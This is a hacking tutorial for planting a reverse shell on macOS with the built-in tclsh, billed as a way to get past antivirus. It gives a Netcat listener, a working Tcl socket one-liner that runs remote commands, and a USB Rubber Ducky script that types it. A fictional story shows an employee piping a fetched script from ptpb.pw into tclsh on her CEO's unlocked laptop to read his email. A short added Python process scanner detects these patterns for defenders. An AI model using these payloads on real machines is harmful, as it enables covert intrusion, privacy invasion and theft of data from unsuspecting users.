How to Use a Tclsh Command to Avoid Antivirus Protection «Null Byte :: WonderHowTo

Using Netcat as a backdoor on a macOS device has its drawbacks. When the compromised Mac goes to sleep, the Netcat background process occasionally does not shut down properly. As a result, Netcat keeps running in the background with a dead connection, and the attacker has no way back into the device. As an alternative, we use the lesser-known Tcl shell, which copes with abrupt backdoor disconnections.

What is Tcl?

Tcl (which stands for "Tool Command Language") is an open-source, general-purpose dynamic programming language similar to the Bourne shell (sh), the C shell (csh), and Perl. Because it is a general-purpose language, it is used for many things, including networking, administrative, and desktop applications. Tcl is mature, cross-platform, easy to deploy, and highly extensible.

Tclsh is a shell-like application that reads Tcl commands. Much like Python or Bash, when tclsh is run without arguments in a terminal it opens interactively and waits for commands from the user. Tcl scripts can also be saved as files with the extensions .tclshrc and .tcl.

Why is Tcl better than Python / Bash backdoors?

As mentioned before, Netcat backdoors can be created with very few characters for fast remote access to a Mac desktop or laptop. However, if the MacBook or other macOS device suddenly goes to sleep, locks, or drops its Wi-Fi connection while the attacker is issuing remote commands, the Netcat process may freeze and stop. This ultimately leaves the attacker with no way to access the device again.

Fortunately, tclsh handles sudden interruptions gracefully and is already present on every macOS device. If you are a macOS user, you can test this by opening a terminal and typing tclsh. You will find that ls and ifconfig work as expected.

Step 1: Starting a Netcat Listener

To use tclsh as a backdoor mechanism, open a terminal in Kali (or any Unix-based operating system with Netcat installed) and enter the following command to start a Netcat listener.

  nc -l -p 9999

Netcat opens a listening (-l) port on every available interface. If you are working on a local network, the Netcat listener is reachable at your local address (for example, 192.168.0.X). If the listener is started on a Virtual Private Server (VPS), make sure you use the VPS IP address in the tclsh commands that follow. The port (-p) number (9999) is arbitrary and can be changed to any number under 65535.

Step 2: Run the tclsh Command

Finally, run the following command on the target macOS device to establish the remote connection. Remember to change the 1.2.3.4 address to the attacker's local or VPS address.

  echo 'set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh &

This command sets a handful of variables and ultimately connects tclsh on the macOS device to the attacker's system. The established shell works as expected, much like any terminal or Netcat shell you have used in the past.

Step 3: Rubber Ducky Payloads (optional)

In future articles I will dive deeper into social engineering techniques for getting macOS users to execute our nefarious commands. For now, let's use a USB Rubber Ducky to execute the command in cases where a few seconds of physical access are possible. Below is a sample payload.

  DELAY 1500
  GUI SPACE
  DELAY 350
  STRING terminal
  DELAY 100
  ENTER
  DELAY 1000
  STRING echo 'set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh &
  ENTER
  GUI q

This Ducky script opens a terminal window via Spotlight and quickly types the long tclsh command. When it is done, the terminal is closed.
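From the defender's side, the three steps above leave a recognisable trace in the process list: a script piped into tclsh (from echo or from curl, as in the story further down) and a Tcl socket used together with exec/eval. The following detector is an added example, not code from the original post; it runs over a constructed ps-style snapshot, and the PIDs, paths and the `SAMPLE_PS` layout are assumptions made for the example.

```python
import re

# Constructed sample in `ps -eo pid,ppid,command` layout (not real output):
# a benign tclsh script, the inline socket one-liner (script body elided),
# a bare interactive tclsh, and a fetch-and-pipe launch.
SAMPLE_PS = """\
  PID  PPID COMMAND
  412     1 /usr/bin/tclsh /Users/alice/tools/report.tcl
  913   880 sh -c echo 'set s [socket 1.2.3.4 9999];while 42 {...exec...}' | tclsh &
  914   913 tclsh
 1020   880 sh -c curl ptpb.pw/ovTg | tclsh -
 1188     1 /usr/bin/python3 -m http.server
"""

# Indicators taken from the technique in this post: a script fed to tclsh
# through a pipe, and a Tcl socket used together with exec/eval.
FETCH_TO_TCLSH = re.compile(r"\b(curl|wget)\b[^|]*\|\s*tclsh\b")
PIPED_INTO_TCLSH = re.compile(r"\|\s*tclsh\b")
TCL_SOCKET = re.compile(r"\[socket\s+\S+\s+\d+\]")
TCL_EXEC_EVAL = re.compile(r"\b(exec|eval)\b")


def parse_ps(text):
    """Yield (pid, ppid, command) from ps-style output; the header is skipped."""
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0].isdigit():
            yield int(parts[0]), int(parts[1]), parts[2]


def scan(text):
    """Return [(pid, reasons)] for command lines that match the indicators."""
    findings = []
    for pid, _ppid, cmd in parse_ps(text):
        reasons = []
        if FETCH_TO_TCLSH.search(cmd):
            reasons.append("remote script fetched and piped into tclsh")
        elif PIPED_INTO_TCLSH.search(cmd):
            reasons.append("inline script piped into tclsh")
        if TCL_SOCKET.search(cmd) and TCL_EXEC_EVAL.search(cmd):
            reasons.append("Tcl socket combined with exec/eval")
        if reasons:
            findings.append((pid, reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_PS):
        print(f"pid {pid}: {'; '.join(reasons)}")
```

A plain tclsh running a local script (PID 412) is not flagged; only the pipe-fed and socket-plus-exec patterns are, which keeps the check usable on hosts where Tcl is legitimately in use.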

It could happen to you

How often does the average user leave their laptop unlocked? More often than you might think. People in positions of power often make the mistake of believing that their employees respect (or fear) them too much to enter their office and personal space when they are not there.

My one-liner payload continues with another fictional short story that shows how easily an employee can compromise a colleague's device.

While the following story is purely fictional and hypothetical, I tested the payload against macOS High Sierra, where Avast antivirus software is

The CEO & the Hacker

Mitnick & Ridpath was a successful California law firm that employed two contract lawyers, Susan Headley and Ramy Badir. One afternoon, during her lunch break in the office, Susan overheard two payroll specialists talking about the lawyers and their annual income. Based on the invoices they had processed for the company, they speculated that Susan earned a third of Ramy's average salary.

The specialists' conversation stayed on Susan's mind for a few days, until she decided to find out whether the gossip was actually true. The company's paper records containing the invoices were kept in filing cabinets secured by high-security locks requiring a nine-digit PIN. Getting the PIN and accessing the cabinets when nobody was around would be extremely difficult.

Susan recalled that the invoices were occasionally emailed to Mike Ridpath, the company's CEO, for approval. This meant that Susan needed access to Mike's corporate email account to view the invoices submitted by Ramy.

The partners, lawyers and paralegals met weekly at the firm to discuss open cases. At the time, Susan was trying to gain access to Mike's email account. She knew he used Avast security software on the latest MacBook Pro, which has no standard USB ports. This meant that a USB Rubber Ducky was out of the question. It would take a few seconds at Mike's computer to enter the tclsh command by hand.

There were four people in the room at this particular meeting: Susan and her assistant, a paralegal, and Mike Ridpath. The conversation about legal cases went as expected. The meeting was almost over when Mike received a personal phone call and walked out of the office. Susan pretended to make a phone call so she would not have to engage with the others in the office. Her assistant and the paralegal took the opportunity to refill their coffee cups and chat by the window on the opposite side of the office.

The paralegal had his back to Mike's MacBook. The assistant could not see the MacBook directly, but could have caught Susan interacting with the laptop in her peripheral vision. It would be very unusual for someone to use Mike's laptop, especially when he was not present, but Susan knew there would be no other opportunity.

She casually walked over to Mike's unlocked MacBook and pressed Command-Space on the keyboard to open the Spotlight search. She then typed "ter" and pressed Return once Terminal was selected. With a terminal window open, she typed the command with one hand.

  curl ptpb.pw/ovTg | tclsh -

She quickly pressed Command-Q to close the Terminal application, then casually stepped away from Mike's MacBook, still pretending to be on the phone.

Susan's assistant shot her a glance while still talking to the paralegal. There was a tense moment of silence as Susan and her assistant stared blankly at each other, but then her assistant turned back to the paralegal and continued the conversation. Her assistant did not seem to notice anything, and even if she had, she did not seem to care.

Stay tuned for more one-liner payloads …

This is just a fictional example of how someone could compromise a MacBook or Mac desktop computer with a single command. There are many more scenarios in which an attacker could gain access to a Mac and deliver a payload without the owner's knowledge. In upcoming articles I will show more lesser-known programs that are built into macOS and can be abused by hackers.

Cover photo by Tranmautritam / Pixabay